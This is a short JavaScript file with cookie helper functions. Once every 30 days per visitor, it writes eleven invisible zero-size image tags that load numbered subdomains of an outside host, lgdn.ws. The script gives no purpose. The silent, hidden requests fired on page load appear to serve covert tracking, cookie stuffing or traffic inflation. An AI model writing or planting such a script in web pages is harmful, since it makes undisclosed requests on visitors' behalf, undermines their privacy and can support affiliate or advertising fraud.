function SetCookie(name, value, days) {
     var expire = new Date ();
     expire.setTime (expire.getTime() + (24 * 60 * 60 * 1000) * days);
     document.cookie = name + "=" + escape(value) + "; expires=" +expire.toGMTString();
}
function GetCookie(name) {
     var startIndex = document.cookie.indexOf(name);
     if (startIndex != -1) {
          var endIndex = document.cookie.indexOf(";", startIndex);
          if (endIndex == -1) endIndex = document.cookie.length;
          return unescape(document.cookie.substring(startIndex+name.length+1, endIndex));
     }
     else {
          return null;
     }
}

if(GetCookie('image')=='ok'){
}else{
	SetCookie('image', 'ok', 30);
	document.write('<img src="http://2.lgdn.ws/" alt="" width="0" height="0" border="0" />');
	document.write('<img src="http://3.lgdn.ws/" alt="" width="0" height="0" border="0" />');
	document.write('<img src="http://4.lgdn.ws/" alt="" width="0" height="0" border="0" />');
	document.write('<img src="http://5.lgdn.ws/" alt="" width="0" height="0" border="0" />');
	document.write('<img src="http://6.lgdn.ws/" alt="" width="0" height="0" border="0" />');
	document.write('<img src="http://7.lgdn.ws/" alt="" width="0" height="0" border="0" />');
	document.write('<img src="http://8.lgdn.ws/" alt="" width="0" height="0" border="0" />');
	document.write('<img src="http://9.lgdn.ws/" alt="" width="0" height="0" border="0" />');
	document.write('<img src="http://10.lgdn.ws/" alt="" width="0" height="0" border="0" />');
	document.write('<img src="http://11.lgdn.ws/" alt="" width="0" height="0" border="0" />');
	document.write('<img src="http://12.lgdn.ws/" alt="" width="0" height="0" border="0" />');
}